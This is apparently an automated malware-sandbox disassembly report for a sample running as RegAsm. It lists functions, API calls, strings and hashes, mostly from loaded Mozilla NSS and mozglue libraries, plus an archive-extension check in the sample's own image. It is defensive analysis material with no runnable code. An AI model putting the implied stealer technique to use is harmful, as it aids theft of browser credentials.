String ID: 0>xl
API String ID: 2721933968-1551380906
Opcode ID: ce1820a0e1ebf0c25f8a26308e300535b219894abca4cc75f6be3bfbaa3ab2b1
Instruction ID: f107b767c0dc5c44cdc89d737b4c26b32113a0a3ec905e0170a3803723a40d51
Opcode Fuzzy Hash: ce1820a0e1ebf0c25f8a26308e300535b219894abca4cc75f6be3bfbaa3ab2b1
Instruction Fuzzy Hash: AB5183B2E001145BDF00DFA9DD88AEFB7B9AF49264F544139E815E7741EB30AD14CBA1

Function 6C78FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C78FADC
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78FAE9
GetCurrentThreadId.KERNEL32 ref: 6C78FB31
GetCurrentThreadId.KERNEL32 ref: 6C78FB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C78FBF6
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78FC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6C78FC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C78FD15

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: 0136d2545361144dcc379cf92bb09a932da71513776ffdda55f2fa1b5eb75bc5
Instruction ID: 32511d0c93521bfa96b8f0bc3a8b85c9612c84a6c9fef337eae39076766da2a0
Opcode Fuzzy Hash: 0136d2545361144dcc379cf92bb09a932da71513776ffdda55f2fa1b5eb75bc5
Instruction Fuzzy Hash: 63712531A05701CFD710DF29C648BAAB7F4FF85308F01457AEA158BB52E734AA44CB92

Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,755683C0,00000000,0041C55B,?), ref: 0041B875
StrCmpCA.SHLWAPI(755683C0,0043613C), ref: 0041B8A3
StrCmpCA.SHLWAPI(755683C0,.zip), ref: 0041B8B3
StrCmpCA.SHLWAPI(755683C0,.zoo), ref: 0041B8BF
StrCmpCA.SHLWAPI(755683C0,.arc), ref: 0041B8CB
StrCmpCA.SHLWAPI(755683C0,.lzh), ref: 0041B8D7
StrCmpCA.SHLWAPI(755683C0,.arj), ref: 0041B8E3
StrCmpCA.SHLWAPI(755683C0,.gz), ref: 0041B8EF
StrCmpCA.SHLWAPI(755683C0,.tgz), ref: 0041B8FB

Strings

.lzh, xrefs: 0041B8D1
.arc, xrefs: 0041B8C5
.tgz, xrefs: 0041B8F5
.zip, xrefs: 0041B8AD
.zoo, xrefs: 0041B8B9
.gz, xrefs: 0041B8E9
.arj, xrefs: 0041B8DD

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD

Function 6C894CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C894CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C894D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C894D37

Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963

PR_LogPrint.NSS3(?,00000000), ref: 6C894D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C894D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C894D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C894DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C894DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C894E20

Strings

(CK_INVALID_HANDLE), xrefs: 6C894D30, 6C894D83
C_GetObjectSize, xrefs: 6C894CEE
*pulSize = 0x%x, xrefs: 6C894E1B
hSession = 0x%x, xrefs: 6C894D12, 6C894D22
hObject = 0x%x, xrefs: 6C894D65, 6C894D75
pulSize = 0x%p, xrefs: 6C894DB7

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 8d63d1a350aef5962d941604854685b2d82936b7d8bcbe586391951b0e01dd32
Instruction ID: 8af0013bf21a2dadd3649e2221f099c82bb045b3e2060fbcce722c3ef37e3995
Opcode Fuzzy Hash: 8d63d1a350aef5962d941604854685b2d82936b7d8bcbe586391951b0e01dd32
Instruction Fuzzy Hash: BA411A75606104AFD7208F18DE88F6A37B5EBD231EF194824F418A7661D731DA48CB61

Function 6C759590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7431C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C743217
Part of subcall function 6C7431C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C743236
Part of subcall function 6C7431C0: FreeLibrary.KERNEL32 ref: 6C74324B
Part of subcall function 6C7431C0: __Init_thread_footer.LIBCMT ref: 6C743260
Part of subcall function 6C7431C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C74327F
Part of subcall function 6C7431C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74328E
Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432AB
Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432D1
Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7432E5
Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7432F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C759675
__Init_thread_footer.LIBCMT ref: 6C759697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7596E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C759707
__Init_thread_footer.LIBCMT ref: 6C75971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7597B7
FreeLibrary.KERNEL32 ref: 6C7597D0
FreeLibrary.KERNEL32 ref: 6C7597EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759824

Strings

ntdll.dll, xrefs: 6C7596E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C759670
MapViewOfFileNuma2, xrefs: 6C7597B1
NtMapViewOfSection, xrefs: 6C759701

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 823137802cf1f6069c3b510419eabd6212fef04c80cca69b8adce507b98ffbee
Instruction ID: 95c7a9b4063f6091fe13eaccf44f6dccdf9d6f49f4d6735dd5686d1425df4e4e
Opcode Fuzzy Hash: 823137802cf1f6069c3b510419eabd6212fef04c80cca69b8adce507b98ffbee
Instruction Fuzzy Hash: F061C5B17002069FDF00CF74DA88B9A7BB5EB5A314F908539F91997780DB30EA65CB91

Function 6C8C6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C991DE0,?), ref: 6C8C6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8C6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C8C6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C8C6D82
DER_GetInteger_Util.NSS3(?), ref: 6C8C6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8C6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C8C6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C8C6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C8C6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C8C6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8C7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C8C7033
free.MOZGLUE(?), ref: 6C8C703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C8C7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C8C7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8C70AF

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 69823fecd5071ebf44e921a401c71a74152437c5fcab737c0a6bc142e4caa752
Instruction ID: e5f1c75db99fcc945f434a99e24bb72a8584072e1b40747f0bfd6dc700985797
Opcode Fuzzy Hash: 69823fecd5071ebf44e921a401c71a74152437c5fcab737c0a6bc142e4caa752
Instruction Fuzzy Hash: 5AA107B1B182059BFB209F24DE45B7A32A4DB8130CF248D3AE959CBB81E775D8458753

Function 6C743AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE768,?,00003000,00000004), ref: 6C743AC5
LeaveCriticalSection.KERNEL32(6C7CE768,?,00003000,00000004), ref: 6C743AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C743AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C743B57
EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C743B81
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C743BA3
EnterCriticalSection.KERNEL32(6C7CE7B8), ref: 6C743BAE
LeaveCriticalSection.KERNEL32(6C7CE7B8), ref: 6C743C74
EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C743C8B
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C743C9F
LeaveCriticalSection.KERNEL32(6C7CE7B8), ref: 6C743D5C
EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C743D67
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C743D8A

Part of subcall function 6C780D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C743DEF), ref: 6C780D71
Part of subcall function 6C780D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C743DEF), ref: 6C780D84

Strings

<jemalloc>, xrefs: 6C743DC7
: (malloc) Error in VirtualFree(), xrefs: 6C743DCC
MOZ_CRASH(), xrefs: 6C743DB2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: 89355897b6568f21b5427e46824acf1e191c34aeb5f01e6c5f3c2dea464176b6
Instruction ID: 49968c1d9171558b37448090643dd3a573978f9354316344b0130c56d73ad2a9
Opcode Fuzzy Hash: 89355897b6568f21b5427e46824acf1e191c34aeb5f01e6c5f3c2dea464176b6
Instruction Fuzzy Hash: 8091B07170020A8FDB04CF78CAC676A77B6FB85314F248638E9199BB85D771E910CB96

Function 6C7511B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C751213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C751285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C7512B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C751327

Strings

CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C75131B
&, xrefs: 6C75126B
MZx, xrefs: 6C7511E1
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C7512AD
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C75120D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 013cb055cce46c05e0453cab191ab9c069ad320ce37d7600324b11880b9addf3
Instruction ID: 6bc4e84866754f1e5e0be89fb7b6c7fae2fb0f58aca3c1702afec8f8d824f1d6
Opcode Fuzzy Hash: 013cb055cce46c05e0453cab191ab9c069ad320ce37d7600324b11880b9addf3
Instruction Fuzzy Hash: 3471C471E017598BDB109F74CA187EEB7F5BF4430AF4406AED445A3B40DB34AA98CB92

Function 6C7431C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C743217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C743236
FreeLibrary.KERNEL32 ref: 6C74324B
__Init_thread_footer.LIBCMT ref: 6C743260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C74327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7432E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7432F7

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

__aulldiv.LIBCMT ref: 6C74346B

Strings

QueryInterruptTime, xrefs: 6C743230
KernelBase.dll, xrefs: 6C743212

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 3d00c8914538f1e696aea6cd8235c184c5e4ad5d22e8d30321608abca04d95b0
Instruction ID: ebc5e2b524d49dc3453763f2d673f8a4218943a6ec6f02af6fa5d64702002e08
Opcode Fuzzy Hash: 3d00c8914538f1e696aea6cd8235c184c5e4ad5d22e8d30321608abca04d95b0
Instruction Fuzzy Hash: 1761E271A087428FC711CF39C55565AB3F4FF86394F218B2DF8A9A3691DB30A6498B42

Function 6C7A6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6694
GetThreadId.KERNEL32(?), ref: 6C7A66B1
GetCurrentThreadId.KERNEL32 ref: 6C7A66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7A66E1
EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6734
GetCurrentProcess.KERNEL32 ref: 6C7A673A
LeaveCriticalSection.KERNEL32(6C7CF618), ref: 6C7A676C
GetCurrentThread.KERNEL32 ref: 6C7A67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C7A6868
RtlCaptureContext.NTDLL ref: 6C7A687F

Strings

WalkStack64, xrefs: 6C7A6890

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: ff335c13c0a560607b318e3772c7949a297725d67a838e0f2254054072d980e3
Instruction ID: 2deb4c9ea0c6383957187abbbb47895be7fcf0115d6f00f188c68599bac10109
Opcode Fuzzy Hash: ff335c13c0a560607b318e3772c7949a297725d67a838e0f2254054072d980e3
Instruction Fuzzy Hash: 8851BE71A09701AFD711CF68CA44B9ABBF8BF89714F008A2DF59897640D770E609CB92

Function 6C874CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C874D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C874D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C874DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C874E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C874E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C874E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C874E85
DER_Encode_Util.NSS3(?,?,6C9C05A4,00000000), ref: 6C874EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C874F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C874F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C874F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C874F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C874F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C874FC8

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 3396b6b36d0f4fd0b131617039788cf3033c50502de49a48071cdd265ff358ef
Instruction ID: ee6e19c446f9f3cf55c3a11846abe99ef4afe9bbc0eeb89fda9cf8075f837a1f
Opcode Fuzzy Hash: 3396b6b36d0f4fd0b131617039788cf3033c50502de49a48071cdd265ff358ef
Instruction Fuzzy Hash: B2818171A083019FE731CF28DA80B5EB7E4ABC5358F148929F958DB641F731E9048FA2

Function 6C79D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D918
GetCurrentThreadId.KERNEL32 ref: 6C79D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D970
GetCurrentThreadId.KERNEL32 ref: 6C79D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C79DA2E
GetCurrentThreadId.KERNEL32 ref: 6C79DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79DA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C79DA91

Part of subcall function 6C765C50: GetTickCount64.KERNEL32 ref: 6C765D40
Part of subcall function 6C765C50: EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79DAB7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

